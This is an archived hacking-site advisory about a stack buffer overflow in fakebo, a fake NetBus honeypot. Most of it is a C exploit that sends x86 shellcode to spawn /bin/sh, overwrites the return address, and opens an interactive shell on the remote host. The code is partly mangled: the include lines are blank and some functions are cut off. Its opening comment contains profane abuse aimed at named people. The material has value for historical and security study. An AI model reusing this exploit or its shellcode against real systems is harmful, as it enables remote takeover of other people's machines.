Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Hacking Techniques :: fakebo.htm

FakeBO - Stack buffer overflow, execute arbitrary code, etc. BKI:



Vulnerability

    fakebo

Affected

    It would be really silly if yours

Description

    Groovy Pants Gus  found following.   Just your standard  smash the
    stack  buffer  overflow,  fakebo  has  an unchecked strcat in it's
    netbus handling code, allowing for remote code execution.

    /*

    Hi Myn, hope  you get hit  by a bus  driven by a  postal worker on
    crack.. you too, mindrape.. fuck you

    */

    #define ADDR 0xBFFFE258 /* Return address, YMMV */

    #include 
    #include 
    #include 
    #include 


    #include 

    #include 

    #include 
    #include 
    #include 
    #include 

    #include 

    /* stolen from qpush */
    void terminal(int s) {
      char buf[1024];
      fd_set rfds;
      fd_set fds;
      int i;

      for (i=0;ih_addr;
	else {
	  printf("Unable to resolve %s!\n", host);
	  exit(1);
	}
      }
      return rc;
    }


    char overflow[] = { /* Ok, it's not the neatest, deal with it */
    #ifdef DEBUG
    0xCC,                           /* int 03h */
    #endif
    0xEB, 53,                       /* jmp forward */
				    /* backwards: */
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x33, 0xDB,                     /* xor ebx, ebx */
    0x33, 0xC9,                     /* xor ecx, ecx */
    0x80, 0xC3, 0x05,               /* add bl, 05h */
    0xCD, 0x80,                     /* int 80h */
   
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x41,                           /* inc ecx */
    0xCD, 0x80,                     /* int 80h */

    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x3F,                     /* add al, 3Fh */
    0x41,                           /* inc ecx */
    0xCD, 0x80,                     /* int 80h */

    0x5B,                           /* pop ebx */
    0x58,                           /* pop eax */
    0x33, 0xC0,                     /* xor eax, eax */
    0x04, 0x0B,                     /* add al, 0Bh */

    0x33, 0xD2,                     /* xor edx, edx */
    0x52,                           /* push edx */
    0x8B, 0xCB,                     /* mov ecx, edx */
    0x83, 0xC1, 0x07,               /* add ecx, 07h */
    0xFE, 0x09,                     /* dec byte ptr [ecx] */
    0x83, 0xC1, 0x03,               /* add ecx, 03h */
    0xFE, 0x09,                     /* dec byte ptr [ecx] */
    0x49,                           /* dec ecx */
    0x49,                           /* dec ecx */
    0x51,                           /* push ecx */
    0x8B, 0xCC,                     /* mov ecx, esp */
    0xCD, 0x80,                     /* int 80h */
				    /* forward:*/
    0xE8, 0xC4, 0xFF, 0xFF, 0xFF,   /* call backward */
    /* data */
    0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x73, 0x68,       /* "/bin/sh" */
    0x01,                                           /* 0x01 */
    0x73, 0x68,                                     /* "sh" */
    0x01                                            /* 0x01 */
    };

    int port = 12345;

    void main (int argc, char **argv) {
      int i, rc;
      char buf[2048];
      struct sockaddr_in sin;
      char *s;
      int sock;

      if (argc != 2) {
	printf("Usage: %s \n", argv[0]);
	exit(0);
      }
      s = strchr(argv[1], ':');
      if (s) {
	*s=0;
	port = atoi(s+1);
      }

      sin.sin_port = htons(port);
      sin.sin_addr.s_addr = resolve(argv[1]);
      sin.sin_family = AF_INET;

      sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (sock == -1) {
	perror("socket()");
	exit(0);
      }

      rc = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
      if (rc == -1) {
	perror("connect()");
	exit(0);
      }

      for (i=0;i<1500;i++)
	buf[i]=0x90;

      memcpy(&buf[999-sizeof(overflow)], overflow, sizeof(overflow));

      buf[999]=ADDR & 0xFF;
      buf[1000]=(ADDR >> 8) & 0xFF;
      buf[1001]=(ADDR >> 16) & 0xFF;
      buf[1002]=(ADDR >> 24) & 0xFF;
      buf[1003]='\n';

      send(sock, buf, 1003, 0);
 
      terminal(sock);
      exit(0);
    }

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH